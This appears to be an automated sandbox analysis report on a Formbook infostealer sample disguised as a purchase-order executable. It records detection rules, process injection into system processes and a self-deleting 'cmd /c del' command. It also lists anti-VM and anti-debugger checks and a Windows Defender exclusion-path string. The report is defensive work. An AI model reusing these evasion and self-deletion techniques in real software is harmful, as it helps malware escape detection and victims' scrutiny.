          Source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO 367628usa.exeStatic PE information: Section: ^8+S|rz ZLIB complexity 1.00031485501
          Source: classification engineClassification label: mal100.troj.evad.winEXE@13/1@9/4
          Source: C:\Users\user\Desktop\PO 367628usa.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 367628usa.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_01
          Source: C:\Users\user\Desktop\PO 367628usa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PO 367628usa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: PO 367628usa.exeVirustotal: Detection: 35%
          Source: C:\Users\user\Desktop\PO 367628usa.exeFile read: C:\Users\user\Desktop\PO 367628usa.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO 367628usa.exe 'C:\Users\user\Desktop\PO 367628usa.exe'
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 367628usa.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 367628usa.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
          Source: C:\Users\user\Desktop\PO 367628usa.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO 367628usa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO 367628usa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.372619692.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO 367628usa.exe, 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO 367628usa.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: PO 367628usa.exe, 00000005.00000002.391160036.00000000034E0000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: PO 367628usa.exe, 00000005.00000002.391160036.00000000034E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.372619692.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PO 367628usa.exeUnpacked PE file: 0.2.PO 367628usa.exe.4b0000.0.unpack ^8+S|rz:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
          Source: PO 367628usa.exeStatic PE information: section name: ^8+S|rz
          Source: PO 367628usa.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD0B91 pushfd ; iretd
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD436F push edx; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD4365 push edx; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054EA96E push ebx; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054EA964 push ebx; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E3390 push 83085F8Bh; ret
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C6732C push E8C84D8Bh; iretd
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 2_2_000D5632 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 2_2_000D304A push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 2_2_000D5668 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 2_2_000D5A6A push ss; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 2_2_000D5680 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 2_2_000D5BA2 push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 2_2_000D5BB4 push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 2_2_000D53B6 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 2_2_000D5BC6 push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 3_2_003F5632 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 3_2_003F5A6A push ss; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 3_2_003F5668 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 3_2_003F304A push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 3_2_003F53B6 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 3_2_003F5BB4 push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 3_2_003F5BA2 push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 3_2_003F5680 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 3_2_003F5BC6 push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 4_2_0040304A push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 4_2_00405668 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 4_2_00405A6A push ss; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 4_2_00405632 push cs; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 4_2_00405BC6 push ds; retf
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 4_2_00405680 push cs; retf
          Source: initial sampleStatic PE information: section name: ^8+S|rz entropy: 7.99978876077
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PO 367628usa.exe PID: 6596, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO 367628usa.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO 367628usa.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000009185E4 second address: 00000000009185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000091897E second address: 0000000000918984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\PO 367628usa.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO 367628usa.exe TID: 6600Thread sleep time: -101657s >= -30000s
          Source: C:\Users\user\Desktop\PO 367628usa.exe TID: 6620Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO 367628usa.exeThread delayed: delay time: 101657
          Source: C:\Users\user\Desktop\PO 367628usa.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.371026456.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000006.00000000.371059787.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.366615816.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.367358532.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.371235181.000000000851A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: raserver.exe, 00000009.00000002.589860170.0000000002F07000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.366615816.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.371286813.0000000008552000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.367358532.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.371026456.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.370907968.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000006.00000000.366615816.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.370907968.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000006.00000000.371059787.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000006.00000002.589360759.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000006.00000000.366615816.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess information queried: ProcessInformation

          Anti Debugging:

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD16E8 CheckRemoteDebuggerPresent,
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01943884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01943884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]
